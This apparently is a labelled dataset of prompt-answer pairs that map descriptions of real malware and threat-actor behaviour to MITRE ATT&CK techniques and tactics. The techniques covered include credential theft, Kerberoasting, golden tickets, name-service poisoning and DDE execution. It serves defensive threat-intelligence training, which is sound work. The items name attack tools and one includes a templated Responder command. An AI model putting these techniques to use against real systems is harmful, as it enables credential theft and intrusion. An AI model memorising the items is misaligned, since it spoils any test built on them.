+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader searches for credentials stored from web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can steal data and credentials from browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger is capable of stealing usernames and passwords from browsers on the victim machine.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.","Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has a module that steals passwords saved in victim web browsers.,"Tecnique: T1555.003 Credentials from Password Stores: Credentials from Web Browsers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers passwords from the Windows Credential Vault.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has gathered credentials from the Windows Credential Manager tool.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used PowerShell cmdlet `Invoke-WCMDump` to enumerate Windows credentials in the Credential Manager in a compromised network.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can collect credentials from the Windows Credential Manager.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LaZagne can obtain credentials from Vault files.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has a plugin that can retrieve credentials from Internet Explorer and Microsoft Edge using `vaultcmd.exe` and another that can collect RDP access credentials using the `CredEnumerateW` function.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz contains functionality to acquire credentials from the Windows Credential Manager.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can steal credentials by leveraging the Windows Vault mechanism.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can gather Windows Vault credentials.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.,"Tecnique: T1555.004 Credentials from Password Stores: Windows Credential Manager, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors accessed and collected credentials from password managers.","Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used scripts to access credential information from the KeePass database.,"Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has accessed local password managers and databases to obtain further credentials from a compromised network.,"Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 obtained a KeePass database from a compromised host.,"Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can gather information from the Keepass password manager.,"Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton gathers credentials in files for 1password.,"Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can steal passwords from the KeePass open source password manager.,"Tecnique: T1555.005 Credentials from Password Stores: Password Managers, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can retrieve secrets from the AWS Secrets Manager via the enum_secrets module.,"Tecnique: T1555.006 Credentials from Password Stores: Cloud Secrets Management Stores, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications.,"Tecnique: T1556 Modify Authentication Process, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can intercept private keys using a trojanized ssh-add function.,"Tecnique: T1556 Modify Authentication Process, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has trojanized the ssh_login and user-auth_pubkey functions to steal plaintext credentials.,"Tecnique: T1556 Modify Authentication Process, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.,"Tecnique: T1556 Modify Authentication Process, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.,"Tecnique: T1556.001 Modify Authentication Process: Domain Controller Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skeleton Key is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller.,"Tecnique: T1556.001 Modify Authentication Process: Domain Controller Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Strider has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to acquire credentials any time a domain, local user, or administrator logs in or changes a password.","Tecnique: T1556.002 Modify Authentication Process: Password Filter DLL, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec harvests plain-text credentials as a password filter registered on domain controllers.,"Tecnique: T1556.002 Modify Authentication Process: Password Filter DLL, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury can deactivate PAM modules to tamper with the sshd configuration.,"Tecnique: T1556.003 Modify Authentication Process: Pluggable Authentication Modules, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.,"Tecnique: T1556.003 Modify Authentication Process: Pluggable Authentication Modules, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWPULSE can modify LDAP and two factor authentication flows by inspecting login credentials and forcing successful authentication if the provided password matches a chosen backdoor password.,"Tecnique: T1556.004 Modify Authentication Process: Network Device Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.,"Tecnique: T1556.004 Modify Authentication Process: Network Device Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After compromising user accounts, Scattered Spider registers their own MFA tokens.","Tecnique: T1556.006 Modify Authentication Process: Multi-Factor Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The AADInternals `Set-AADIntUserMFA` command can be used to disable MFA for a specified user.,"Tecnique: T1556.006 Modify Authentication Process: Multi-Factor Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWPULSE can insert malicious logic to bypass RADIUS and ACE two factor authentication (2FA) flows if a designated attacker-supplied password is provided.,"Tecnique: T1556.006 Modify Authentication Process: Multi-Factor Authentication, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has edited the `Microsoft.IdentityServer.Servicehost.exe.config` file to load a malicious DLL into the AD FS process, thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name.","Tecnique: T1556.007 Modify Authentication Process: Hybrid Identity, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can inject a malicious DLL (`PTASpy`) into the `AzureADConnectAuthenticationAgentService` to backdoor Azure AD Pass-Through Authentication.,"Tecnique: T1556.007 Modify Authentication Process: Hybrid Identity, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has added additional trusted locations to Azure AD conditional access policies.,"Tecnique: T1556.009 Modify Authentication Process: Conditional Access Policies, Tactic: TA0006 Credential Access TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.,"Tecnique: T1557 Adversary-in-the-Middle, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.,"Tecnique: T1557 Adversary-in-the-Middle, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group executed Responder using the command [Responder file path] -i [IP address] -rPv on a compromised host to harvest credentials and move laterally.,"Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.","Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.,"Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution.,"Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.,"Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services.,"Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Responder is used to poison name services to gather hashes and credentials from systems within a local network.,"Tecnique: T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cleaver has used custom tools to facilitate ARP cache poisoning.,"Tecnique: T1557.002 Adversary-in-the-Middle: ARP Cache Poisoning, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used ARP spoofing to redirect a compromised machine to an actor-controlled website.,"Tecnique: T1557.002 Adversary-in-the-Middle: ARP Cache Poisoning, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used Mimikatz to generate Kerberos golden tickets.,"Tecnique: T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can leverage its implementation of Mimikatz to obtain and use golden tickets.,"Tecnique: T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz's kerberos module can create golden tickets.,"Tecnique: T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rubeus can forge a ticket-granting ticket.,"Tecnique: T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account.,"Tecnique: T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can leverage its implementation of Mimikatz to obtain and use silver tickets.,"Tecnique: T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz's kerberos module can create silver tickets.,"Tecnique: T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rubeus can create silver tickets.,"Tecnique: T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used PowerSploit's `Invoke-Kerberoast` module to request encrypted service tickets and bruteforce the passwords of Windows service accounts offline.","Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline.","Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used Kerberoasting PowerShell commands such as, `Invoke-Kerberoast` for credential access and to enable lateral movement.","Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.","Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can decode Kerberos 5 tickets and convert it to hashcat format for subsequent cracking.,"Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire uses PowerSploit's Invoke-Kerberoast to request service tickets and return crackable ticket hashes.,"Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Impacket modules like GetUserSPNs can be used to get Service Principal Names (SPNs) for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.,"Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Invoke-Kerberoast module can request service tickets and return crackable ticket hashes.,"Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rubeus can use the `KerberosRequestorSecurityToken.GetRequest` method to request kerberoastable service tickets.,"Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY contains a module to conduct Kerberoasting.,"Tecnique: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rubeus can reveal the credentials of accounts that have Kerberos pre-authentication disabled through AS-REP roasting.,"Tecnique: T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has the ability to create a pipe to enable inter-process communication.,"Tecnique: T1559 Inter-Process Communication, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperStack can connect to the IPC$ share on remote machines.,"Tecnique: T1559 Inter-Process Communication, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can use pipes to redirect the standard input and the standard output.,"Tecnique: T1559 Inter-Process Communication, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PITSTOP can listen over the Unix domain socket located at `/data/runtime/cockpit/wd.fd`.,"Tecnique: T1559 Inter-Process Communication, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When executing with non-root permissions, RotaJakiro uses the the `shmget API` to create shared memory between other known RotaJakiro processes. This allows processes to communicate with each other and share their PID.","Tecnique: T1559 Inter-Process Communication, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has the ability to move data between its kernel and user mode components, generally using named pipes.","Tecnique: T1559 Inter-Process Communication, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group malware can insert malicious macros into documents using a Microsoft.Office.Interop object.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.","Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use a COM object to execute queries to gather system information.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has used the `WshShortcut` COM object to create a .lnk shortcut file in the Windows startup folder.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can execute files on remote machines using DCOM.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use the ITaskService, ITaskDefinition and ITaskSettings COM interfaces to schedule a task.","Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can use a COM component to generate scheduled tasks.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can use the Windows COM API to schedule tasks and maintain persistence.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot used COM to setup scheduled task for persistence.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif droppers have used COM objects to execute the malware's full executable payload.,"Tecnique: T1559.001 Inter-Process Communication: Component Object Model, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, threat actors sent malicious Word OLE documents to victims.","Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has delivered JHUHUGIT and Koadic by executing PowerShell commands through DDE in Word documents.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used Windows DDE for execution of commands and a malicious VBS.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has sent malicious Word OLE compound documents to victims.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that can execute PowerShell scripts via DDE.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork leveraged the DDE protocol to deliver their malware.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has leveraged malicious Word documents that abused DDE.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT has been delivered via Word documents using DDE for execution.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can use DDE to execute additional payloads on compromised hosts.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT was delivered with documents using DDE to execute malicious code.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has been delivered using OLE objects in malicious documents.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can execute tasks via OLE.,"Tecnique: T1559.002 Inter-Process Communication: Dynamic Data Exchange, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.,"Tecnique: T1560 Archive Collected Data, Tactic: TA0009 Collection"
